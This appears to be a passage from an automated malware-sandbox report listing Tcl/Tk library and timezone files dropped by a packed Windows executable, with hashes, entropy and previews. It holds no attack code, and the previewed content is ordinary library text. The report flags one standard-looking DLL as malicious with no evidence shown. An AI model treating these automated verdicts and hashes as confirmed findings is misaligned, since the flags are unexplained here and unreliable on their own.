                                                                                                                                                                                                                                                    SHA1:15C01523EDA134D3E38ECC0A5909A4579BD2A00D
                                                                                                                                                                                                                                                    SHA-256:9324B6C871AC55771C44B82BF4A92AE0BE3B2CC64EBA9FE878571225FD38F818
                                                                                                                                                                                                                                                    SHA-512:C697401F1C979F5A4D33E1026DCE5C77603E56A48405511A09D8CE178F1BF47D60F217E7897061F71CFEA63CC041E64340EF6BAEE0EB037AFD34C71BF0591E3E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Universal) $TZData(:Etc/UTC).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\W-SU

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):167
                                                                                                                                                                                                                                                    Entropy (8bit):4.9534620854837295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVwTwpVAIgoqzTcYFgIuyQauTnn:SlSWB9IZaM3ymdVAIgohYFgXymn
                                                                                                                                                                                                                                                    MD5:58FBF79D86DBCFF53F74BF7FE5C12DD6
                                                                                                                                                                                                                                                    SHA1:EA8B3317B012A661B3BA4A1FAE0DC5DEDC03BC26
                                                                                                                                                                                                                                                    SHA-256:0DECFEACCE2E2D88C29CB696E7974F89A687084B3DB9564CDED6FC97BCD74E1F
                                                                                                                                                                                                                                                    SHA-512:083B449DE987A634F7199666F9C685EADD643C2C2DD9C8F6C188388266729CE0179F9DC0CD432D713E5FB1649D0AA1A066FE616FC43DA65C4CD787D8E0DE00A6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Moscow)]} {. LoadTimeZoneFile Europe/Moscow.}.set TZData(:W-SU) $TZData(:Europe/Moscow).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\WET

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6694
                                                                                                                                                                                                                                                    Entropy (8bit):3.6896780927557495
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:D6U5vo30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:5PIMj544IrvfMsbxZTH7qwQ
                                                                                                                                                                                                                                                    MD5:CD86A6ED164FEB33535D74DF52DC49A5
                                                                                                                                                                                                                                                    SHA1:89843BF23AB113847DCC576990A4FF2CABCA03FE
                                                                                                                                                                                                                                                    SHA-256:AF28754C77BA41712E9C49EF3C9E08F7D43812E3317AD4E2192E971AD2C9B02D
                                                                                                                                                                                                                                                    SHA-512:80C0A7C3BDD458CA4C1505B2144A3AD969F7B2F2732CCBE4E773FBB6ED446C2961E0B5AFFBC124D43CE9AB530C42C8AEC7100E7817566629CE9D01AC057E3549
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:WET) {. {-9223372036854775808 0 0 WET}. {228877200 3600 1 WEST}. {243997200 0 0 WET}. {260326800 3600 1 WEST}. {276051600 0 0 WET}. {291776400 3600 1 WEST}. {307501200 0 0 WET}. {323830800 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 36

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Zulu

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):149
                                                                                                                                                                                                                                                    Entropy (8bit):4.830292555237936
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLtaFBURFu:SlSWB9IZaM3yzUFVAIgBLYFaRI
                                                                                                                                                                                                                                                    MD5:6C7C2CE174DB462A3E66D9A8B67A28EB
                                                                                                                                                                                                                                                    SHA1:73B74BEBCDAEBDA4F46748BCA149BC4C7FE82722
                                                                                                                                                                                                                                                    SHA-256:4472453E5346AAA1E1D4E22B87FDC5F3170AA013F894546087D0DC96D4B6EC43
                                                                                                                                                                                                                                                    SHA-512:07209059E5E5EB5EE12821C1AC46922DA2715EB7D7196A478F0FA6866594D3C69F4C50006B0EE517CBF6DB07164915F976398EBBD88717A070D750D5D106BA5D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Zulu) $TZData(:Etc/UTC).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\word.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4674
                                                                                                                                                                                                                                                    Entropy (8bit):4.7695981796995355
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Le+U54W3Jp3jgr9a+1FeS9D/CkXg6gvF9D/CYjX16AyyrGuA11/JRJ6xMa89RJ6m:q+W/ga+P39DCd6gt9DC+6AjG9Vn6xMV3
                                                                                                                                                                                                                                                    MD5:DE79F133B24EFA0AD1A8CB0B1F90210F
                                                                                                                                                                                                                                                    SHA1:3C7133228F078C3EB2FBDC05481226FF7D82F40D
                                                                                                                                                                                                                                                    SHA-256:64585C5327B0710D31BFF61C14564FF289ACAAD8743174F95544D8C04306D8C7
                                                                                                                                                                                                                                                    SHA-512:E6F515139B980EDD420E0CD2883146C3C3F472381C8F55E65284CF50AE7D87EFF20B775D539A5FE7F0007DE52DC50F351464F988FE956E916B767D2629D897F9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# word.tcl --.#.# This file defines various procedures for computing word boundaries in.# strings. This file is primarily needed so Tk text and entry widgets behave.# properly for different platforms..#.# Copyright (c) 1996 by Sun Microsystems, Inc..# Copyright (c) 1998 by Scritpics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# The following variables are used to determine which characters are.# interpreted as white space...if {$::tcl_platform(platform) eq "windows"} {. # Windows style - any but a unicode space char. set ::tcl_wordchars {\S}. set ::tcl_nonwordchars {\s}.} else {. # Motif style - any unicode word char (number, letter, or underscore). set ::tcl_wordchars {\w}. set ::tcl_nonwordchars {\W}.}..# Arrange for caches of the real matcher REs to be kept, which enables the REs.# themselves to be cached for greater performance (and somewhat greater.# clarity too

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk85.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                                                                    Entropy (8bit):6.301036497326883
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:yorhrGbk0PpCcnCKZrhzuSWTAEn/RgaT2NX8nYRZR2KUk:JcbwKrjWTADaOKYRZQ
                                                                                                                                                                                                                                                    MD5:245C2904F86E27FD357ED7B3962CB435
                                                                                                                                                                                                                                                    SHA1:D38FFB5474C20551740877F9939349F88AA78259
                                                                                                                                                                                                                                                    SHA-256:8065EA4D6BA1CEFCB632B8C942F4ED19A4809816264F7BE5319119FD859B9065
                                                                                                                                                                                                                                                    SHA-512:C646CAB1D9FB7D99AE673130EC0C621FA26DF9D02E264F27828CC27A3A91150E88C7C9BA8D474FD688A94FA9AAB9C8BCBD73F1048A877CFF4DE99D8CECCE7C9C
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.{...{...{....q..{....`..{....g..{....w..{...{...z....m.J{....v..{....p..{....u..{..Rich.{..........PE..L....x.]...........!.....^.........._........p...."......................................................................=........... ..................................................................@............p.. ............................text...@\.......^.................. ..`.rdata.......p.......b..............@..@.data........`.......L..............@....rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\bgerror.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8119
                                                                                                                                                                                                                                                    Entropy (8bit):4.822252992121729
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:tKrjzDL5//n7n0rBnT2dpEX9ImoYgMu1Z+4wNsf9IkzxekkEUoVS//iNx:tITL5//jxetHxKGkzxesvAKv
                                                                                                                                                                                                                                                    MD5:9F9316AF7FB23FA66AF05529AF4B95C9
                                                                                                                                                                                                                                                    SHA1:AE429F2175A1CEDF83F4A23E1EDAB6101028F5F1
                                                                                                                                                                                                                                                    SHA-256:7CB80810562587D866D182A5F33174EF43B1E0CBBC2B15BF797B5A76B4FD1917
                                                                                                                                                                                                                                                    SHA-512:2DE40D272B837B9A5A2F33B75E75B6335EB08F4756DDA8767AB3FC2FFE192B6929DE04D989A811216F133536562E3EB3EE20C3B2BDA919B8DC6FFAA53501A566
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# bgerror.tcl --.#.#.Implementation of the bgerror procedure. It posts a dialog box with.#.the error message and gives the user a chance to see a more detailed.#.stack trace, and possible do something more interesting with that.#.trace (like save it to a log). This is adapted from work done by.#.Donal K. Fellows..#.# Copyright (c) 1998-2000 by Ajuba Solutions..# Copyright (c) 2007 by ActiveState Software Inc..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..namespace eval ::tk::dialog::error {. namespace import -force ::tk::msgcat::*. namespace export bgerror. option add *ErrorDialog.function.text [mc "Save To Log"] \..widgetDefault. option add *ErrorDialog.function.command [namespace code SaveToLog]. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault. if {[tk windowingsystem] eq "aqua"} {..option add *ErrorDialog*background systemAlertBackgroundActive \...widgetDefault..option add *ErrorDialog*info.text.background white widgetDefault.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\button.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20134
                                                                                                                                                                                                                                                    Entropy (8bit):4.902628577193507
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:EzRtoY3wFnq+j4SpEdPmVmZ6/IVKuzmSaox2ESo+VtocUP5wFnq+j4SpEdPmV8ZK:GoahPSFMmfoz4oFXhPovzmToQBy0zm2I
                                                                                                                                                                                                                                                    MD5:44757F5BDF236E6872FCF82E88D79ACC
                                                                                                                                                                                                                                                    SHA1:01D45BC2E18BBD24FBB484E56C8DEDB270C2DC13
                                                                                                                                                                                                                                                    SHA-256:716F551DA055EE03E0A5145633754917183264F70C657EC478B6D39B0DB20DE8
                                                                                                                                                                                                                                                    SHA-512:4F4C7F878BF90BCFC6E08EBB3565A8D57A34307DCCA61E47B82C6715ACA1F3AA706A746CD893976049D4C3D5C1494EADCAF14B9866EA7C0DA6FCE0B94AAE3C0F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# button.tcl --.#.# This file defines the default bindings for Tk label, button,.# checkbutton, and radiobutton widgets and provides procedures.# that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 2002 ActiveState Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for buttons..#-------------------------------------------------------------------------..if {[tk windowingsystem] eq "aqua"} {. bind Radiobutton <Enter> {..tk::ButtonEnter %W. }. bind Radiobutton <1> {..tk::ButtonDown %W. }. bind Radiobutton <ButtonRelease-1> {..tk::ButtonUp %W. }. bind Checkbutton <Enter> {..tk::ButtonEnter %W. }. bind Checkbutton <1>

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\choosedir.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Nim source code, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9644
                                                                                                                                                                                                                                                    Entropy (8bit):4.7532230880971715
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:MvjK3vpIKU7JBhpZofNAieYemp8U3wNV97oZAWpopePXUstccjocIv6tq9jJKT4L:M4viKeBQ+3M3wNwfwsFiSIv6wO7R33nC
                                                                                                                                                                                                                                                    MD5:39531504664D07DB43D884F5D1BCA6A9
                                                                                                                                                                                                                                                    SHA1:1B511035F111CACF45D5D23704345ABC7FFDF5C1
                                                                                                                                                                                                                                                    SHA-256:A0F86258294A5D7D7A9475F3A397F5DABA4CF7D748A57C66EA456B4E8C6CA2E1
                                                                                                                                                                                                                                                    SHA-512:BD50BA9E76D4CDEC1FCCED9EF3EED46767A8FE9DDFCAADD85858584FAB883AAB1B140BC7EF4E88E8690DD66E8209FFC165B27B4125F2CFE77DE54B27C3454123
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# choosedir.tcl --.#.#.Choose directory dialog implementation for Unix/Mac..#.# Copyright (c) 1998-2000 by Scriptics Corporation..# All rights reserved...# Make sure the tk::dialog namespace, in which all dialogs should live, exists.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}..# Make the chooseDir namespace inside the dialog namespace.namespace eval ::tk::dialog::file::chooseDir {. namespace import -force ::tk::msgcat::*.}..# ::tk::dialog::file::chooseDir:: --.#.#.Implements the TK directory selection dialog..#.# Arguments:.#.args..Options parsed by the procedure..#.proc ::tk::dialog::file::chooseDir:: {args} {. variable ::tk::Priv. set dataName __tk_choosedir. upvar ::tk::dialog::file::$dataName data. Config $dataName $args.. if {$data(-parent) eq "."} {. set w .$dataName. } else {. set w $data(-parent).$dataName. }.. # (re)create the dialog box if necessary. #. if {![winfo exists $w]} {..::tk::dialog::file::Create

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\clrpick.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21301
                                                                                                                                                                                                                                                    Entropy (8bit):4.982898618853273
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:HjJsgeqJelEc661T26UYdBVDyPHxQlefbGIjVjrdOqAQBxhKN2zD5yT9RmqEdFC6:DagJJlRfxQEHN
                                                                                                                                                                                                                                                    MD5:6E658C822220893266EAE22DC14DFF01
                                                                                                                                                                                                                                                    SHA1:AFF84F123E886DF2FCFBE69488AC733E26697F8F
                                                                                                                                                                                                                                                    SHA-256:1C4AB4BBBD9C37B6F4696917030AD13BBB14CD4502FF81AD211157D8BCE6C29A
                                                                                                                                                                                                                                                    SHA-512:DE7A7BC99644B8AD5FB89F4FBEAE648951AA6EDB213CA8D2CFFA8D6EADA2D194C6996DA120536B915020D2A5E4921E08E7D05A478A18DB1A0283ECAC26D56954
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# clrpick.tcl --.#.#.Color selection dialog for platforms that do not support a.#.standard color selection dialog..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.# ToDo:.#.#.(1): Find out how many free colors are left in the colormap and.#. don't allocate too many colors..#.(2): Implement HSV color selection. .#..# Make sure namespaces exist.namespace eval ::tk {}.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::color {. namespace import ::tk::msgcat::*.}..# ::tk::dialog::color:: --.#.#.Create a color dialog and let the user choose a color. This function.#.should not be called directly. It is called by the tk_chooseColor.#.function when a native color selector widget does not exist.#.proc ::tk::dialog::color:: {args} {. variable ::tk::Priv. set dataName __tk__color. upvar ::tk::dialog::color::$dataName data. set w .$dataName

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\comdlg.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7726
                                                                                                                                                                                                                                                    Entropy (8bit):5.004404304157801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Aq7APy5HEO9KY8QHyWpLWNRYG50aGAZbQWlO+W0WvHv/3WvWHLV7LKpTTk:Aq7A6HJ9K+yWpaNRYuVDST1rvveuHZLT
                                                                                                                                                                                                                                                    MD5:2E0793510BA032CBE424A716CF00A8F0
                                                                                                                                                                                                                                                    SHA1:DCE9925FF6FCA2CB34D9FAC0280E97924DE885A7
                                                                                                                                                                                                                                                    SHA-256:2591BBD2BC87D8F551A12D5F7F3F3EF21F070244E5EBA62E09DB003787F91790
                                                                                                                                                                                                                                                    SHA-512:4D81B1E9569650C85978045AD5AAC78EF37A986F1DC21A5A10E7544B1D2269184A5571D8F6C0CA9D61CA2C78B94BA7100B3ACC46F89520A1829A87533B29FA03
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# comdlg.tcl --.#.#.Some functions needed for the common dialog boxes. Probably need to go.#.in a different file..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# tclParseConfigSpec --.#.#.Parses a list of "-option value" pairs. If all options and.#.values are legal, the values are stored in.#.$data($option). Otherwise an error message is returned. When.#.an error happens, the data() array may have been partially.#.modified, but all the modified members of the data(0 array are.#.guaranteed to have valid values. This is different than.#.Tk_ConfigureWidget() which does not modify the value of a.#.widget record if any error occurs..#.# Arguments:.#.# w = widget record to modify. Must be the pathname of a widget..#.# specs = {.# {-commandlineswitch resourceName ResourceClass defaultValue verifier}.# {....}.# }.#.# flags = currently unused..#.# argList

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\console.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):29634
                                                                                                                                                                                                                                                    Entropy (8bit):4.917740343704056
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:eWptONWz4xOtyU/W1ZQWiVEwYGl7nS5r+KtuQlLW4qvRHTrStCO2FfB2vW3cwcZL:eWp0NWz4niTeG6r+K4YE6GMWFOYoV
                                                                                                                                                                                                                                                    MD5:3F162B54E4981151C12FE7ABC899D754
                                                                                                                                                                                                                                                    SHA1:C668D83FB92246714B9296303B14772BE4406C24
                                                                                                                                                                                                                                                    SHA-256:0C4F8AFDF412C3A23BE4C87BC597A32E98995E4957841021FBA34D0938B49F60
                                                                                                                                                                                                                                                    SHA-512:84FB3295EF2907A26E968553F8B65F4FE38E9C11D0A303CFF3F7477E474E397FA6319013ED7174D0057D5D4C8127D5A73BFFD56D32D085F258A7689795AC4396
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# console.tcl --.#.# This code constructs the console window for an application. It.# can be used by non-unix systems that do not have built-in support.# for shells..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# TODO: history - remember partially written command..namespace eval ::tk::console {. variable blinkTime 500 ; # msecs to blink braced range for. variable blinkRange 1 ; # enable blinking of the entire braced range. variable magicKeys 1 ; # enable brace matching and proc/var recognition. variable maxLines 600 ; # maximum # of lines buffered in console. variable showMatches 1 ; # show multiple expand matches.. variable inPlugin [info exists embed_args]. variable defaultPrompt ; # default prompt

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\dialog.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6006
                                                                                                                                                                                                                                                    Entropy (8bit):4.773863015400918
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WfPaDCAV8OgciKHKKcmQH+DmlYm4Kalo9mBy//IWxIb:WfPwCAVviKHKK4H+DmT4Kalo4ynDOb
                                                                                                                                                                                                                                                    MD5:02E1EA6A212E59B5B2C0B19527997D25
                                                                                                                                                                                                                                                    SHA1:1FEE1494D003542D114A5C7AE01A3DDEBDF3D871
                                                                                                                                                                                                                                                    SHA-256:8B15235D85AC90ED02EC86C48EA674C94FBB1A84E126867A5A6945A1F694743F
                                                                                                                                                                                                                                                    SHA-512:3589303BFB0C3306473770F54425111BE22EC0E66F618E7598A6082810469A3ADA44F6D44CA3A7E1760EC67277349AF6EF98A7D2949E839D910519F225DFF41B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# dialog.tcl --.#.# This file defines the procedure tk_dialog, which creates a dialog.# box containing a bitmap, a message, and one or more buttons..#.# Copyright (c) 1992-1993 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#.# ::tk_dialog:.#.# This procedure displays a dialog box, waits for a button in the dialog.# to be invoked, then returns the index of the selected button. If the.# dialog somehow gets destroyed, -1 is returned..#.# Arguments:.# w -..Window to use for dialog top-level..# title -.Title to display in dialog's decorative frame..# text -.Message to display in dialog..# bitmap -.Bitmap to display in dialog (empty string means none)..# default -.Index of button that is to display the default ring.#..(-1 means none)..# args -.One or more strings to display in buttons across the.#..bottom of t

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\entry.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17147
                                                                                                                                                                                                                                                    Entropy (8bit):4.928989585252014
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:PleFkH2fRdOnOeQod3tCAERebMIDlXVQgXwVviw:P8FDqUy8V
                                                                                                                                                                                                                                                    MD5:570E6828DE3D920F3D28929A80AE709A
                                                                                                                                                                                                                                                    SHA1:9454DC6EC8262704FE46714C341A7A5A7C1032D5
                                                                                                                                                                                                                                                    SHA-256:10C9CB07C75F0E9FCC88576672A275BD35D91CC157CDF6C1FEF54998C32722C3
                                                                                                                                                                                                                                                    SHA-512:F9E2AE818056027A5DA2483CB26B26E0A7A48F2141DD84442570333EF12DCD773B79B7596111FA17A3B0B46ADC89B7D4481D38F5478DBCF82D13DA4BA77BD0A9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# entry.tcl --.#.# This file defines the default bindings for Tk entry widgets and provides.# procedures that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a selection)..# pressX -..X-coordinate at which the mouse button was pressed..# selectMode -..The style of selection currently underway:.#...char, word, or line..# x, y -..La

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\focus.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4857
                                                                                                                                                                                                                                                    Entropy (8bit):4.7675047842795895
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:mumhRUI7F2WyHm6BUyNhEf6jUHKRUI7F2WyQe6L763AcnK0/61sk2ko5AgEplauw:ERUQFU52CNRUQFpLOQIG1sk2TCLplauw
                                                                                                                                                                                                                                                    MD5:7EA007F00BF194722FF144BE274C2176
                                                                                                                                                                                                                                                    SHA1:6835A515E85A9E55D5A27073DAE1F1A5D7424513
                                                                                                                                                                                                                                                    SHA-256:40D4E101A64B75361F763479B01207AE71535337E79CE6E162265842F6471EED
                                                                                                                                                                                                                                                    SHA-512:E2520EB065296C431C71DBBD5503709CF61F93E74FE324F4F8F3FE13131D62435B1E124D38E2EC84939B92198A54B8A71DFC0A8D32F0DD94139C54068FBCAAF2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
